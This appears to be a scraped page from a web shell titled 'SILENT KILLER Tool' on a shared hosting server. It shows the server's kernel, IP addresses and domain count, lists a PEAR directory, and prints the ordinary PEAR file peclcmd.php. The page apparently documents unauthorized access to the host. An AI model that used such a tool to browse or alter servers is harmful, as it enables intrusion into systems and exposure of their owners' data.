Current Path: > > opt > cloudlinux > alt-php81 > root > usr > > share > > pear
Operation : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64 Software : Apache Server IP : 198.54.126.42 | Your IP: 216.73.216.135 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
.channels | Directory | - | - | |
.pkgxml | Directory | - | - | |
.registry | Directory | - | - | |
Archive | Directory | - | - | |
Auth | Directory | - | - | |
Console | Directory | - | - | |
File | Directory | - | - | |
Directory | - | - | ||
Net | Directory | - | - | |
OS | Directory | - | - | |
PEAR | Directory | - | - | |
Structures | Directory | - | - | |
XML | Directory | - | - | |
data | Directory | - | - | |
test | Directory | - | - | |
.depdb | File | 3891 bytes | May 28 2024 11:53:41. | |
.depdblock | File | 0 bytes | May 28 2024 11:53:41. | |
.filemap | File | 7521 bytes | May 12 2025 17:50:56. | |
.lock | File | 0 bytes | May 12 2025 17:50:56. | |
Mail.php | File | 9878 bytes | December 02 2021 08:42:45. | |
PEAR.php | File | 36244 bytes | May 12 2025 17:50:56. | |
System.php | File | 20694 bytes | May 12 2025 17:50:56. | |
pearcmd.php | File | 14995 bytes | May 12 2025 17:50:56. | |
peclcmd.php | File | 1123 bytes | May 12 2025 17:50:56. |
<?php /** * PEAR, the PHP Extension and Application Repository * * Command line interface * * PHP versions 4 and 5 * * @category pear * @package PEAR * @author Stig Bakken <ssb@php.net> * @author Tomas V.V.Cox <cox@idecnet.com> * @copyright 1997-2009 The Authors * @license http://opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/PEAR */ /** * @nodep Gtk */ //the space is needed for windows include paths with trailing backslash // http://pear.php.net/bugs/bug.php?id=19482 if ('/opt/alt/php81/usr/share/pear ' != '@'.'include_path'.'@ ') { ini_set('include_path', trim('/opt/alt/php81/usr/share/pear '). PATH_SEPARATOR . get_include_path()); $raw = false; } else { // this is a raw, uninstalled pear, either a cvs checkout, or php distro ini_set('include_path', __DIR__ . PATH_SEPARATOR . get_include_path()); $raw = true; } define('PEAR_RUNTYPE', 'pecl'); require_once 'pearcmd.php'; /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * indent-tabs-mode: nil * mode: php * End: */ // vim600:syn=php ?>
SILENT KILLER Tool